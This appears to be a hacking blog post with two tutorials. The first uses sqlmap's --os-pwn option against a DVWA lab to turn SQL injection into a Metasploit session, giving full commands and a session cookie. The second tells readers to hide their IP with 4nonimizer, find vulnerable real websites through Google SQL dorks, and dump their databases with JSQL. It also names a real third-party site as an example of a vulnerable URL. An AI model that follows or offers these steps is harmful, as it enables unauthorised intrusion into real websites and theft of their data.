Sql injection to Metasploit session

Wassap people i am him the one and only laughing man back with ye another post this one on sql injection to metasploit session I know most you thinking laughing man you talking shit well sorry lads I’m not metasploit framework has many uses not just for payloads the can do almost anything from recon to exploiting so for this iv set up a lad with dvwa so lets start lads

What is sql injection

SQL injection is a code injection technique that might destroy your database.
SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements, via web page input.

Find out more here

what is Metasploit Framework

The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development.

Find out more here

What is Dvwa

DVWA is a DAMM VULNERABLE WEB APP coded in PHP/MYSQL. Seriously it is too vulnerable. In this app security professionals, ethical hackers test their skills and run this tools in a legal environment. It also helps web developer better understand the processes of securing web applications and teacher/students to teach/learn web application security in a safe environment.
The aim of DVWA is to practice some of the most common web vulnerability, with various difficulties levels.

Find out more here

what is burp suite

Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications.
Find out more here

What is sqlmap

sqlmap is an open source software that is used to detect and exploit database vulnerabilities and provides options for injecting malicious codes into them. It is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws providing its user interface in the terminal.
Find out more here

How to preform the attack

first of all we get a are target this my target http://192.168.8.101/DVWA/vulnerabilities/sqli//DVWA/vulnerabilities/sqli/?id=1&Submit=Submit# now i have my target i can check is it vulnerable to sql injection so what we do is put a ‘ right after the 1 in the url so the url looks like this http://192.168.8.101/DVWA/vulnerabilities/sqli/?id=1'&Submit=Submit#

once you see this
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”1”’ at line 1 message when you add the ‘ at the end the of the url for example http://www.asfaa.org/members.php?id=1'

as u see in this image when we add the ‘ at the end the url it tells us theres a error ”
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /nfs/c05/h02/mnt/83231/domains/asfaa.org/html/members.php on line 67″
when we get this error we can use tools like sqlmap , burp suite etc

Now we need to set up the burpsute proxy’s in firefox so type about:preferences in to the url bar in firefox to get the settings scroll down to network

and the proxy for burp suite

now we load up burp suite open the terminal type burp suite or go to the top left of the screen to applications and to web applications analysis and click burp suite

now when we add the ‘ to the url burp suite will pop up

The cookie we need is Cookie: security=low; security=low; PHPSESSID=4kaa6819siab01k545959q45v0

now we open a new terminal and type sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --dbs

now we type sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --msf-path=/usr/share/metasploit-framework/ --os-pwn --tmp-path="C:/Docments and settings/Administrator/Local Settings/Temp"

now we pick the payload i mostly pick php

this will add the payload to the site and inject it to the browser of the views

show the proof it was connected

there ya have it lads and gals how to use sqlmap to get a metasploit session dont use this for the wrong reasons hacking is agen the law unless you have consent of owner

Hacking with JSQL on Kali Linux

All right my little noob’s so due to my google dorks post i mite as well show u how to use them in an attack so since my man nife did sqlmap u can check it out here –> Sql-map basics

I am going two show you how to use JSQL on kali so frist of u need to hide you ip so check out this post for changing dns —> Changing dns

now i want u to download 4nonimizer or git clone same thing and install it
git clone https://github.com/Hackingriseofficial/4nonimizer
cd 4nonimizer
chmod +x 4nonimier
./4nonimizer install

by default vpnbook is the main vpn u can get the user name and password at VPNBOOK
Once its install and working open fire fox and type any the google sqldorks <-- here 🙂copy one and paste it to google and hit search
when you get the url u wanna hack open it and add ‘ at the end the url if u get a my sql error u can hack it copy the url with out the ‘ and open jsql in database assessment on the kali menu and paste the url to the attack bar and hit enter

just let it run and there you got u got the data base

CONGRATS UR A SCRIPT KIDDIE LOL 😀

HAPPY HACKING LADS